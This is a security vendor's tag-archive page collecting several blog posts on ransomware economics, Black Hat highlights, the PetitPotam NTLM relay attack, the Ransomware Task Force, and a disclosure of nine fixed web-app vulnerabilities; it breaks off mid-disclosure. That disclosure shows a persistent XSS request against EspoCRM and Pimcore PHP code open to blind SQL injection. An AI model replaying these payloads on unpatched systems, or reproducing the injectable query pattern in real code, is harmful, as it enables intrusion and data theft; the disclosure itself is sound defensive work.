Tag Archives: Vulnerability management

Slot Machines and Cybercrime: Why Ransomware Won’t Quit Pulling Our Lever

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2021/08/06/slot-machines-and-cybercrime-why-ransomware-wont-quit-pulling-our-lever/

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

The casino floor at Bally’s is a thrilling place, one that loads of hackers are familiar with from our time at DEF CON. One feature of these casinos is the unmistakable song of slots being played. Imagine a slot machine that costs a dollar to play, and pays out $75 if you win what probability of winning would it take for you to play?

Naively, I’d guess most people’s answers are around “1 in 75” or maybe “1 in 74” if they want to turn a profit. One in 74 is a payout probability of about 1.37%. Now, at 1.37%, you turn a profit, on average, of $1 for 74 games so how many times do you play? Probably not that many. You’re basically playing for free but you’re not pulling much off $1 profit per 74 pulls. At least on average.

But what if that slot machine paid out about half the time, giving you $75 every other time you played? How many times would you play?

This is the game that ransomware operators are playing.

Playing Against the Profiteers

Between Wannacry, the Colonial Pipeline hack, and the recent Kaseya incident, everyone is now familiar with supply chain attacks — particularly those that use ransomware. As a result, ransomware has entered the public consciousness, and a natural question is: why ransomware? From an attacker’s perspective, the answer is simple: why not?

For the uninitiated, ransomware is a family of malware that encrypts files on a system and demands a payment to decrypt the files. Proof-of-concept ransomware has existed since at least 1996, but the attack vector really hit its stride with CryptoLocker’s innovative use of Bitcoin as a payment method. This allowed ransomware operators to perpetuate increasingly sophisticated attacks, including the 2017 WannaCry attack — the effects of which, according to the ransomware payment tracker Ransomwhere, are still being felt today.

Between the watering hole attacks and exploit kits of the Angler EK era and the recent spate of ransomware attacks targeting high-profile companies, the devastation of ransomware is being felt even by those outside of infosec. The topic of whether or not to pay ransoms — and whether or not to ban them — has sparked heated debate and commentary from folks like Tarah Wheeler and Ciaran Martin at the Brookings Institute, the FBI, and others in both industrial and academic circles. One noteworthy academic paper by Cartwright, Castro, and Cartwright uses game theory to ask the question of whether or not to pay.

Ransomware operators aren’t typically strategic actors with a long-term plan; rather, they’re profiteers who seek targets of opportunity. No target is too big or too small for these groups. Although these analyses differ in the details, they get the message right — if the ransomware operators don’t get paid, they won’t want to play the game anymore.

Warning: Math Ahead

According to Kaspersky, 56% of ransomware victims pay the ransom. Most other analyses put it around 50%, so we’ll use Kaspersky’s. In truth, it’s unlikely we have an accurate number for this, as many organizations specifically choose to pay the ransom in order to avoid public exposure of the incident.

If a ransomware attack costs some amount of money to launch and is successful some percentage of the time, the amount of money made from each attack is:

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

We call this the expected value of an attack.

It’s hard to know how many attacks are launched — and how many of those launched attacks actually land. Attackers use phishing, RDP exploits, and all kinds of other methods to gain initial access. For the moment, let’s ignore that problem and assume that every attack that gets launched lands. Ransomware that lands on a machine is successful about 54% of the time, and the probability of payment is 56%. Together, this means that the expected value of an attack is:

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

Given the average ransom payment is up to $312,493 as of 2020 — or using Sophos’s more conservative estimate, $170,404 — that means ransomware authors are turning a profit as long as the cost of an attack is less than $127,747.14 (or the more conservative $51,530.17). Based on some of the research that’s been done on the cost of attacks, where high-end estimates put it at around $4,200, we can start to see how a payout of almost 75 times the cost to play becomes an incentive.

In fact, because expected values are linear and the expected value is only for one play, we can see pretty quickly that in general, two attacks will give us double the value of one, and three will triple it. This means that if we let our payout be a random variable X, a ransomware operator’s expected value over an infinite number of attacks is… infinite.

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

Obviously, an infinite number of ransomware attacks is not reasonable, and there is a limit to the amount that any individual or business can pay over time before they just give up. But from an ideal market standpoint, the message is clear: While ransoms are being paid at these rates and sizes, the problem is only going to grow. Just like you’d happily play a slot machine that paid out almost half the time, attackers are happy to play a game that gets them paid more than 40% of the time, especially because the profits are so large.

Removing Incentives

So why would ransomware operators ever stop if, in an idealized model, there’s potentially infinite incentive to keep playing? A few reasons:

  1. The value of payments is lower
  2. The cost becomes prohibitive
  3. The attacks don’t work
  4. Nobody is paying

Out of the gate, we can more or less dismiss the notion that payment values will get lower. The only way to lower the value of the payment is to lower the value of Bitcoin to nearly zero. We’ve seen attempts to ban and regulate cryptocurrencies, but none of those have been successful.

In terms of the monetary cost, this is also pretty much a dead end for us. Even if we could remove all of the efficiencies and resilience of darknet markets, that would only remove the lowest-skill attackers from the equation. Other groups would still be capable of developing their own exploits and ransomware.

Ultimately, what our first two options have in common is that they deal, in a pretty direct way, with adversary capabilities. They leave room for adversaries to adapt and respond, ultimately trying to affect things that are in the control of attackers. This makes them much less desirable avenues for response.

So let’s look at the things that victims have control over: defenses and payments.

Defending Against Ransomware

Defending against ransomware is quite similar to defending against other attack types. In general, ransomware is not the first-stage payload delivered by an exploit; instead, it’s dropped by a loader. So the name of the game is to prevent code execution on endpoints. As security professionals, this is something we know quite well.

For ransomware, the majority of attacks come via a handful of vectors, which will be familiar to most security practitioners:

  • Phishing
  • Vulnerable services
  • Weak passwords, especially on Remote Desktop Protocol
  • Exploit kits

Many of these initial access vectors are things that can be kept in check with user training, vulnerability scans, and sound patching practices. Once initial access is established, many of these ransomware operators use software like WMI, PSExec, Powershell, and Cobalt Strike, in addition to commodity malware like Trickbot, to move laterally before hitting the entire network with ransomware.

Looking for these indicators of compromise is one way to limit the potential impact of ransomware. But of course, these techniques are hard to detect, and no organization is able to catch 100% of the bad things that are coming at them. So what do victims do when the worst happens?

Choosing Not to Pay

When ransomware attacks are successful, victims have two primary choices: pay or don’t. There are many follow-on decisions from each of these decisions, but the first and most critical decision (for the attacker) is whether or not to pay the ransom.

When people pay the ransom, they’re likely — though not guaranteed — to get their files back. However, because of the significant amounts of first stage implants and lateral movement associated with ransomware attacks, there’s still a lot of incident response work to be done beyond the return of the files. For many organizations, if they don’t have a suitable off-site backup in place, this may feel like an inevitable impact of this type of attack. As Tarah Wheeler pointed out, this is often something that can simply be written off as a business expense. Consequently, hackers get paid, companies get to write off the loss, and nobody learns a lesson.

As we discussed above, when you pay a ransom, you’re paying for the next attack, and according to reports from the UK’s NCSC, you may also be paying for human trafficking. None of us wants to be funding these attackers, but we want to protect our data. So how do we get away from paying?

As we mentioned before, preventing the attacks in the first place is the optimal outcome for us as defenders, but security solutions are never 100% effective. The easiest way not to pay is to have an off-site backup. That will let you invoke your normal incident response process but have your data intact. In many cases, this isn’t any more expensive than paying, and you’re guaranteed to get your data back.

In some cases, a decrypter is available for the ransomware. The decrypters can be used by victims to restore their files without paying the ransom. Organizations like No More Ransomware make decrypters available for free, saving organizations significant amounts of money paying for decryption keys.

Having a network configuration that makes lateral movement difficult will also reduce the “blast radius” of the attack and can help mitigate the spread. In these cases, you may be able to get away with reimaging a handful of employee laptops and accepting the loss. Ultimately, letting people write off their backups instead of their ransom payments encourages the switch to having sensible backup policies and discouraging these ransomware operators.

Why the Wheel Keeps Spinning

Ransomware remains a significant problem, and I hope we’ve demonstrated why: the incentives for everyone, including victims, are there to increase the number of ransomware attacks. Attackers who do more attacks will see more profits, which fund subsequent attacks. While victims can write off their payments, there’s no incentive to take steps to mitigate the impact of ransomware, so the problem will continue.

Crucially, ransomware attackers aren’t picky about their victims. They’re not nation-state actors who seek to target only the largest companies with the most intellectual property. Rather, they’re attackers of opportunity — their victim is anyone who lets their lever be pulled, and as long as the victims keep paying out often enough, attackers are happy to play.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Post Syndicated from Dwayne A. Johnson original https://blog.rapid7.com/2021/08/05/black-hat-recap-1/

Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

OK, no big deal, we know how this goes. Once again, many of us are attending Black Hat in a virtual capacity as COVID-19 meanders its way out of our lives. The good news is that there’s an actual live component again this year in Las Vegas, and that’s progress. Here’s hoping that next year the pandemic will be more firmly in the rearview and any remaining travel trepidation will be a “2021 thing.”    

So flip the on-switch to some neon lights if you got ‘em, and let’s get into what our Rapid7 experts thought were the biggest takeaways from a busy Day 1 of new tools, techniques, and up-to-the-minute information.

Want our daily Black Hat takeaways sent directly to your inbox?

Get started

Detection and Response



Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Key takeaways

  • Does it make sense for an organization to “roll its own SIEM”? Yes and no (because of course that’s the answer). For very specific use cases outside of the norm, it might make sense to start the often-herculean, cost-prohibitive task of building that cloud-native SIEM to best serve hyper-specific needs. But is it worth it to miss out on the high-quality, actionable intel a commercial vendor brings to the table?  
  • When it comes to distributed malware, attackers are bypassing traditional detection. Return Oriented Programming (ROP — pronounced “rope”) grants attackers a bypass route through initial access points to get onto an endpoint faster and easier. However, the real endgame is to bypass that endpoint agent and hack the network at large.  
  • Just how easy is it to hack a hotel? If you were the victim of a hotel hack, you might think a ghost had taken up residence in your room as your IoT-connected bed suddenly moves up and down. However, the proliferation of unprotected networks and IoT devices in modern hotels has created unprecedented opportunities for attackers to gain nefarious access. A back-to-basics approach might be the best way forward for the hospitality industry.

Vulnerability Risk Management



Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Key takeaways

  • Open Platform Communications (OPC) standards are a wondrous thing, allowing products across many industries to interact and exchange data efficiently. But is security a priority? When commercial vendors all along a supply chain start making their own customizations to the common legacy protocol, well, security isn’t so secure anymore.
  • Find an active-directory certificate vulnerability? Good luck getting it patched. These configuration-related instances are flaws that larger organizations might be hesitant to acknowledge. Check out this (extremely long, but informative) whitepaper on the subject — and the accompanying blog — from SpecterOps.
  • Printer vulnerabilities aren’t paper-thin. Windows Printer Spooler can offer up an attack surface that leads to an instance like the PrintDemon incident. Some of the larger vulnerabilities see attackers and exploit authors leveraging printer path names.  

Research and Policy



Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Key takeaways

  • Let’s talk lasers — specifically, how attackers can use them to exploit vulnerabilities in hardware like bitcoin wallets. One would hope that the key material they’re storing in that wallet is secure. However, with a laser you can “look through” a silicon chip to confuse the CPU and bypass security checks.  
  • Wondering how future information wars will be fought? By bots. Advanced bots, that is — those that leverage Generative Pre-Trained Transformer (GPT) language models like GPT-3. With this powerful tool, a small group of people could generate misinformation at scale, quickly spinning up thousands of fake social accounts creating individual posts that sound like actual human language. That’s scary.  
  • As far as we know, AI cannot yet be arrested. However, threat actors can still run afoul of digital crime laws like the Computer Fraud and Abuse Act (CFAA) when they employ adversarial machine learning. This “poisoned data” results in systems learning things they shouldn’t. Current federal and state computer-crime laws need to reflect these more sophisticated AI attack methods so that, you know, the machines don’t win.  

We’ll see you right back here tomorrow for Black Hat Day 2 insights and takeaways from the Rapid7 team!

Want our daily Black Hat takeaways sent directly to your inbox?

Get started

PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/

PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS

Late last month (July 2021), security researcher Topotam published a proof-of-concept (PoC) implementation of a novel NTLM relay attack christened “PetitPotam.” The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running — including domain controllers.

PetitPotam works by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing an attacker who is able to leverage the technique to do… pretty much anything they want with a Windows domain (e.g., deploy ransomware, create nefarious new group policies, and so on). The folks over at SANS ISC have a great write-up here.

According to Microsoft’s ADV210003 advisory, Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:

  • Certificate Authority Web Enrollment
  • Certificate Enrollment Web Service

NTLM relay attacks aren’t new — they’ve been around for decades. However, a few things make PetitPotam and its variants of higher interest than your more run-of-the-mill NTLM relay attack. As noted above, remote attackers don’t need credentials to make this thing work, but more importantly, there’s no user interaction required to coerce a target domain controller to authenticate to a threat actor’s server. Not only is this easier to do — it’s faster (though admittedly, well-known tools like Mimikatz are also extremely effective for gathering domain administrator-level service accounts). PetitPotam is the latest attack vector to underscore the fundamental fragility of the Active Directory privilege model.

Microsoft released an advisory with a series of updates in response to community concern about the attack — which, as they point out, is “a classic NTLM relay attack” that abuses intended functionality. Users concerned about the PetitPotam attack should review Microsoft’s guidance on mitigating NTLM relay attacks against Active Directory Certificate Services in KB500413. Since it looks like Microsoft will not issue an official fix for this vector, community researchers have added PetitPotam to a running list of “won’t fix” exploitable conditions in Microsoft products.

The PetitPotam PoC is already popular with red teams and community researchers. We expect that interest to increase as Black Hat brings further scrutiny to Active Directory Certificate Services attack surface area.

Mitigation Guidance

In general, to prevent NTLM relay attacks on networks with NTLM enabled, domain administrators should ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) coupled with “Require SSL” for affected virtual sites, or signing features such as SMB signing. Implementing “Require SSL” is a critical step: Without it, EPA is ineffective.

As an NTLM relay attack, PetitPotam takes advantage of servers on which Active Directory Certificate Services (AD CS) is not configured with the protections mentioned above. Microsoft’s KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) emphasizes that the primary mitigation for PetitPotam consists of three configuration changes (and an IIS restart). In addition to primary mitigations, Microsoft also recommends disabling NTLM authentication where possible, starting with domain controllers.

In this order, KB5005413 recommends:

  • Disabling NTLM Authentication on Windows domain controllers. Documentation on doing this can be found here.
  • Disabling NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. For step-by-step directions, see KB5005413.
  • Disabling NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

While not included in Microsoft’s official guidance, community researchers have tested using NETSH RPC filtering to block PetitPotam attacks with apparent success. Rapid7 research teams have not verified this behavior, but it may be an option for blocking the attack vector without negatively impacting local EFS functionality.

Rapid7 Customers

We are investigating approaches for adding assessment capabilities to InsightVM and Nexpose to determine exposure to PetitPotam relay attacks.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

The Ransomware Task Force: A New Approach to Fighting Ransomware

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/03/the-ransomware-task-force-a-new-approach-to-fighting-ransomware/

The Ransomware Task Force: A New Approach to Fighting Ransomware

In the past few months, we’ve seen ransomware attacks shut down healthcare across Ireland, fuel delivery across parts of the US, and meat processing across Australia, Canada and the US. We’ve seen demands of payments in the tens of millions of dollars. We’re also continuing to see trends around ransomware-as-a-service and double or triple extortion continuing to rise. It’s clear that ransomware attacks are increasing in frequency, breadth, sophistication, scale, and impact.

Recognizing this, the Institute for Security and Technology put together a comprehensive Ransomware Task Force (RTF) to identify new approaches to shift the dynamics of ransomware and reduce opportunities for attackers. The Ransomware Task Force involved more than 60 participants representing a wide range of expertise and experience, including from multiple governments, law enforcement, civil society and public policy nonprofits, and security advancement groups. From the private sector, organizations of all sizes participated, including many that have experienced ransomware attacks firsthand or that are involved in dealing with the fallout, such as cybersecurity companies, law firms, and cyber insurers. Rapid7 was among those that participated — I was one of the co-chairs, and my amazing colleagues, Bob Rudis, Tod Beardsley, and Scott King participated as well.

From the outset, the intent of the Task Force was to look at the issue holistically and come up with a comprehensive set of recommendations to deter and disrupt ransomware attackers, thereby helping organizations prepare for and respond to attacks at scale. Recognizing the scale and severity of the issue — and the need for systemic and societal responses — our target audience was policymakers and government leaders.

The Task Force recognized that ransomware is not a new topic, and we had no desire to rehash previous efforts. Instead, we sought to learn from them and, where appropriate, amplify and extend them, supporting the next period of growth on this thorny issue. Ransomware’s reach and impact are increasing, which has a serious impact on society. The effects are only likely to worsen without significant action from governments and other leaders.

Key recommendations

The final report issued by the Task Force makes 48 recommendations, broken into actions to deter, disrupt, prepare for, and respond to ransomware attacks. The recommendations are designed to work in concert with each other, though we recognize there are a large number of them, and many will take time to implement. In reality, though, there truly is no silver bullet for addressing ransomware, no one thing that will magically solve this problem. If we want to shift the dynamics in a meaningful way that makes it harder for attackers to succeed, we need to make adjustments in a range of areas. It’s also worth noting that the Task Force’s goal was to provide recommendations to government and other leaders, not to provide tactical, technical guidance.

Given there are 48 recommendations, and they are well set out in the report, I won’t go over them now. I’ll just highlight a few of the big themes and, where relevant, what’s happened since the launch of the report.

Make it a top priority

One of the biggest challenges we face with any discussion around cybercrime is that it’s often viewed as a niche technical problem, not as a broad societal issue. This has made it harder to get the required attention and investment in solutions. The Task Force called for senior political leaders to recognize ransomware for what it is: a national security issue and a major threat to our ways of life (Action 1.2.5, page 26). We also called for a whole-of-government approach whereby leaders would engage various stakeholders across the government to help ensure necessary action is taking place collaboratively across the board (Actions 1.2.1 and 1.2.2, page 23).

One possible silver lining of the recent attacks against critical infrastructure is that they’ve helped establish this level of priority. In the US, we’ve seen various parts of the government start to take action: Congress has held hearings and proposed legislation; the Department of Justice has given ransomware investigations similar status to those for terrorism; the Department of Homeland Security has issued new cybersecurity guidelines for pipelines; the White House issued a memo to urge the private sector to take steps to protect against ransomware; and even President Biden has talked about ransomware in press conferences and with other world leaders.

Global action for a global problem

To take meaningful action to reduce ransomware attacks, we must acknowledge the geopolitical aspects. Firstly, the issue affects countries all around the world. Governments taking action should do so in coordination and cooperation in order to amplify the impact and hit attackers on multiple fronts at once (Actions 1.1.1 – 1.1.4, 1.2.6, pages 21-22, 26).

Secondly, and perhaps more crucially, one of the main advantages for attackers is the existence of nations that provide safe havens, because they’re either unwilling or unable to prosecute cybercriminals. This also makes it much harder for other countries to prosecute these criminals, and as such, ransomware attackers rarely seem to fear consequences for their actions.

The Task Force recommended that governments work together to tackle the issue of safe havens and adopt key practices to protect their citizens — or help them better protect themselves (Actions 1.3.1 and 1.3.2, page 27).

We’ve already seen some progress in this regard, as ransomware was raised at the recent G7 Summit, and the resulting communique included the following commitment from members:

“We also commit to work together to urgently address the escalating shared threat from criminal ransomware networks. We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions.”

It will be interesting to see whether and how the G7 members will follow through on this commitment. I hope they’ll take action, build momentum, and recruit participation from other nations.

Reducing paths to revenue

As mentioned above, we’re seeing attackers demand higher and higher ransoms, which likely attracts other criminals to enter the market. Hopefully, the opposite is also true; if we reduce the opportunity to make money from ransomware, the number of attacks will decrease.

This rationale, coupled with discomfort over the idea of ransom payments being used to fund other types of organized crime — including human trafficking, child exploitation, and weapons trafficking — resulted in a great deal of discussion around the notion of banning ransom payments.

While the Task Force agreed that payments should be discouraged, the idea of a legal prohibition was challenging. Given the lack of real risk or friction for attackers, it’s likely that if payments were outlawed, attackers wouldn’t simply give up. Rather, they’d first play a game of chicken against victims, focusing on the organizations least likely to resist paying — namely providers of critical functions that can’t be disrupted without profound impact on society, or small-to-medium businesses that aren’t financially able to prepare for and weather an attack.

Given the concerns over these practicalities, the Task Force did not recommend banning payments. Rather, we looked at alternative ways of reducing the ease with which attackers realize a profit. There are two main paths to this: reducing the likelihood of victims making a payment, and making it technically harder for attackers to get their payment.

In terms of making victims think twice before making a payment, the RTF recommended a few measures:

  • Requiring the disclosure of payments (Action 4.2.4, page 46): This will help to build greater understanding of what is happening in the attack landscape and may enable law enforcement to build more information on attackers, or even recapture payments.
  • Requiring organizations to conduct cost-benefit analysis prior to making payments (Action 4.3.1 and 4.3.2, pages 47 and 48): This will encourage organizations to look into alternative options for resolution — for example, turning to the No More Ransom Project to seek decryption keys.
  • Creating a fund to assist certain organizations in recovery (Action 4.1.2, page 43): Often, organizations say the cost of recovery significantly outsizes that of the ransom, leaving them no choice but to give into their attacker’s demands. For qualifying organizations, this fund would rebalance the scales and give them a pragmatic alternative to paying the ransom.

On the other track — disrupting the system that facilitates the payment of ransoms — the RTF recommended that cryptocurrency exchanges, kiosks, and over-the-counter trading desks be required to comply with existing laws, such as Know Your Customer (KYC), Anti-Money Laundering (AML), and Combatting Financing of Terrorism (CFT) (Action 2.1.2, pages 29 and 30).

Better preparation, better response

During the explorations of the Task Force, it became apparent that part of the reason ransomware attacks are so successful is that many organizations don’t truly understand the threat, believe it’s relevant to them, or understand how to protect themselves. We repeatedly heard that, while there is a lot of information on ransomware, it’s overwhelming and often unhelpful. Many organizations don’t know what to focus on, and guidance may be oversimplified, overcomplicated, or insufficient.

With this in mind, one of our top recommendations was for the development of a ransomware framework that would cover measures for both preparing for and responding to attacks (Action 3.1.1, pages 35 and 36). The framework would need to be pragmatic, actionable, and address varying levels of sophistication and capability (Action 3.1.2, page 36). And because one of our main themes was around international cooperation, we also recommended there be a single source of truth adopted and promoted by multiple governments around the world. In fact, we recommended the framework be developed through both international and public-private collaboration. It should also be kept up to date to react to evolving ransomware attack trends.

Creating the framework is a lift, but it’s only part of the battle — you can’t drive adoption if you don’t also tackle the lack of awareness and understanding. As such, we also recommend that governments run high-profile awareness campaigns, partnering with organizations with reach into audiences that aren’t being well addressed today (Actions 3.2.1 and 3.2.2, pages 37 and 38). For example, many governments have toolkits or content aimed at small-to-medium businesses, but most leaders of these organizations seem largely unaware of the risk — until someone they know personally is hit by an attack.

The path forward

Unfortunately, ransomware continues to dominate headlines and harm organizations around the world. As a result, many governments are paying a great deal of attention to this issue and looking for solutions. I’m relieved to say the Ransomware Task Force’s report and recommendations have seen a fair bit of interest and support. For us, the next challenge is to keep the momentum going and help governments translate interest into action.

In the meantime, my colleagues at Rapid7 and I will continue to try to help our customers and community prepare for and respond to attacks. We’re working on some other content to help people better understand the dynamics of the issue, as well as the steps they can take to protect themselves or get involved in broader response efforts.

Look out for our series of blogs on different aspects of ransomware, and in the meantime, check out our interviews with ransomware experts on our Security Nation podcast. You can also check out my talk and Q&A on the Ransomware Task Force at Black Hat, or as part of Rapid7’s Virtual Vegas, which includes a Ransomware (un)Happy Hour — bring your ransomware war stories, lessons learned, or questions.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Multiple Open Source Web App Vulnerabilities Fixed

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/07/27/multiple-open-source-web-app-vulnerabilities-fixed/

Multiple Open Source Web App Vulnerabilities Fixed

Today, Rapid7 is disclosing 9 vulnerabilities that affect 3 open-source projects: EspoCRM, Pimcore, and Akaunting. Right out of the gate, I’d like to give a special thanks to these 3 open-source project maintainers. While it’s never great to learn of new vulnerabilities in your own product, all 3 project maintainers accepted, validated, and provided fixes for these vulnerabilities within one day, which is amazing when it comes to vulnerability disclosure. EspoCRM was notified on May 4, 2021 and patched source on May 5; Akaunting, on May 13 and turned it around on May 14; and Pimcore validated their vulnerabilities on April 29 after learning about them on April 28, 2021. Nice work, all around.

Now, I’m not sure why open source is just so much faster than the typical proprietary software vuln-patching pipeline, at least for the disclosures I’ve been involved in. It might be because, in open source, you’re almost guaranteed to have your first communication with a hands-on-keyboard software engineer who is personally and emotionally invested in the software; whereas in proprietary land, first contact might be a lightly monitored support alias, staffed by a third-party provider. Rapid7’s vulnerability disclosure process assumes a minimum of 60 days for remediation of any vulnerability we report to a vendor, and I’d say about half the time, we’re looking at more like 90 to 120 days from report to disclosure — and, sometimes, we are left with the unhappy option of publishing without a fix in hand at all.

Of course, proprietary software occasionally offers fast turnaround times on validation and fixes to source, as well (SonicWall comes to mind), and proprietary vendors often have very good reason to take their time with acknowledging, fixing, testing, and releasing fixes; but the fact remains that what’s normal in open source communities — hyperfast turnaround on fixing reported vulnerabilities — is a rarity in proprietary software.

By the way, these aren’t one- or two-person passion projects. All 3 of these projects have real users, real customers of their attendant support services and cloud-hosted versions, and are undoubtedly the core applications supporting thousands of small to medium businesses running today. This popularity is the reason why Trevor and Wiktor took a look at them in the first place; they suspected these small-to-medium business applications haven’t seen a ton of attention from the eye of a penetration tester, and this blog post is a result of testing that hypothesis.

With that, I’ll stop picking on proprietary software vendors in general and switch gears to take a look at the specific vulnerabilities in these specific projects.

Common Vulnerability Classes

From this completely unscientific and statistically insignificant sampling of vulnerabilities, we can draw the deeply unsurprising conclusion that enterprise web applications tend to suffer from common web-application vulnerabilities. 3 are examples of persistent cross-site scripting (XSS), where a malicious user can plant a bit of browser-executable code in the application, which is designed to lie in wait and trigger when someone else comes along and loads that code, and 2 are SQL injection (SQLi) vulnerabilities, where the attacker uses the web application as a convoluted portal to issue direct commands to the backing database, usually to steal data or create powerful web-app users.

SQL injection used to be a nice way to get a command injection path to the underlying operating system, but that’s something of a rarity these days. But, 1 issue disclosed here is a command injection issue, which we rate as the highest critical vulnerability of the bunch, since it can allow the attacker to commandeer the operating system and do things like use it as a beachhead into the rest of the network, install a cryptominer or ransomware, or perform other nefarious lower-level actions.

The remaining vulnerabilities are: a denial-of-service vulnerability, where the attacker can crash the whole application with a naughty HTTP request; an authentication bypass, where the attacker can move from one logical group to another without authorization; and a weak password-reset vulnerability, where the attacker can abuse the “I forgot my password” function to source a phishing email from the application to a registered user.

The table below provides the salient information about the 9 vulnerabilities being disclosed today. Note that every vulnerability listed here was promptly fixed by the vendor in the typical open-source manner. In short: if you use any of these applications in your business and keep up on your updates, you already have the fixes. The rest of this post details the individual findings by Wiktor Sędkowski of Nokia and Trevor Christiansen of Rapid7, who worked together on this project and disclosed these issues through Rapid7’s vulnerability disclosure process.

We’re publishing these details today so other, similar web applications can be made aware of these vulnerability classes and take a look at their own codebases to make sure they’re not making the same mistakes. Thanks, Wiktor and Trevor!

CVE Affected Project CWE Base CVSS Status
CVE-2021-3539 EspoCRM v6.1.6 CWE-79 (Persistent XSS) 6.3 (Medium) Fixed in version 6.1.7
CVE-2021-31867 Pimcore Customer Data Framework v3.0.0 CWE-89 (SQL Injection) 6.5 (Medium) Fixed in v3.0.2
CVE-2021-31869 Pimcore AdminBundle v6.8.0 CWE-89 (SQL Injection) 6.5 (Medium) Fixed in v6.9.4
CVE-2021-36800 Akaunting v2.1.12 CWE-94 (Code injection) 8.7 (High) Fixed in Akaunting v2.1.13
CVE-2021-36801 Akaunting v2.1.12 CWE-639 (Auth bypass) 8.5 (High) Fixed in Akaunting v2.1.13
CVE-2021-36802 Akaunting v2.1.12 CWE-248 (Uncaught Exception DoS) 6.5 (Medium) Fixed in Akaunting v2.1.13
CVE-2021-36803 Akaunting v2.1.12 CWE-79 (Persistent XSS) 6.3 (Medium) Fixed in Akaunting v2.1.13
CVE-2021-36804 Akaunting v2.1.12 CWE-640 (Weak Password Reset) 5.4 (Medium) Fixed in Akaunting v2.1.13
CVE-2021-36805 Akaunting v2.1.12 CWE-79 (Persistent XSS) 5.2 (Medium) Fixed in Akaunting v2.1.13

EspoCRM v6.1.6 (1 issue)

EspoCRM is an open-source customer relationship management (CRM) application used in all sorts of industries, although it seems to enjoy special success in the real estate sector. More about EspoCRM can be found at the vendor’s website.

CVE-2021-3539: EspoCRM Avatar Persistent XSS

Any user with default rights, which allows them to upload their own avatar, can abuse the API for this by providing executable Javascript code instead of an image. An example call to the API is detailed below:

PUT /api/v1/User/609108e6b123bb29d HTTP/1.1
Host: 10.0.0.10:8443
{redacted}
Content-Length: 43
Origin: https://10.0.0.10:8443
Connection: close
Referer: https://10.0.0.10:8443/
Cookie: {redacted}

{
"avatarId":"\" onerror=\"alert(0)\" "
}

This leads to rendering the avatar as:

Multiple Open Source Web App Vulnerabilities Fixed

resulting in triggering the `onerror` event:

Multiple Open Source Web App Vulnerabilities Fixed

Because EspoCRM allows administrators to install arbitrary, custom extensions, an attacker can leverage this XSS to silently coerce an administrator (who views the attacker’s avatar) to install a malicious extension, thus retaining permanent control of the web application, as seen in the screenshot below.

Multiple Open Source Web App Vulnerabilities Fixed

Pimcore Customer Data Framework v3.0.0 (1 issue)

Pimcore CDF is a component of the Pimcore platform and is a CRM enterprise application. More about Pimcore CDF can be found at the vendor’s website.

CVE-2021-31867: Pimcore CDF ‘SegmentAssignmentController.php’ Blind SQL Injection

An SQL injection vulnerability exists in the Customer Management Framework Bundle, specifically in the SegmentAssignmentController.php component. The vulnerable code was introduced in commit 6fc8aff8f95fc168d173ef3b473760dd98d026c4 and is shown below.

php
public function inheritableSegments(Request $request)
{
$id = $request->get('id') ?? '';
$type = $request->get('type') ?? '';
/* @var $db Connection */
$db = $this->get(Connection::class);
$parentIdStatement = sprintf('SELECT `%s` FROM `%s` WHERE `%s` = "%s"', $type === 'object' ? 'o_parentId' : 'parentId', $type.'s', $type === 'object' ? 'o_id' : 'id', $id);
$parentId = $db->fetchOne($parentIdStatement);
$segments = $this->get(SegmentManagerInterface::class)->getSegmentsForElementId($parentId, $type);
$data = array_map([$this, 'dehydrateSegment'], array_filter($segments));
return $this->adminJson(['data' => array_values($data)]);
}

`$id` is retrieved from the request parameters and then placed directly into the SQL query through the use of `sprintf` and then executed (as long as `$type` is something other than `object`). This allows a malicious actor to inject the SQL query through the use of a single quote `’`.

This vulnerability can be thought of as a Boolean-based Blind SQL Injection, as an exploit is unable to pull out data from the database directly, but has to piece together the information through a series of True/False requests.

This image below shows a request that tests if the integer 1 equals 1:

Multiple Open Source Web App Vulnerabilities Fixed

The response returns a `200 OK` along with the data that has an `id` of 137:

Multiple Open Source Web App Vulnerabilities Fixed

This second request tests if the integer 1 is equal to 2:

Multiple Open Source Web App Vulnerabilities Fixed

This time, the response is a `500 Internal Server Error` along with a stack trace.

Multiple Open Source Web App Vulnerabilities Fixed

Using these 2 queries, a malicious actor can automate the retrieval of information from the database. This last example shows a query to find the first character of the version from the database server.

Multiple Open Source Web App Vulnerabilities Fixed

Pimcore AdminBundle v6.8.0 (1 issue)

Pimcore AdminBundle is part of the core Pimcore platform, a Product Information Management (PIM) platform, which is closely related to the Enterprise Resource Planning (ERP) functions of a business. More about the Pimcore platform can be found at the vendor’s website.

CVE-2021-31869: Pimcore AdminBundle ‘specificID’ SQL Injection

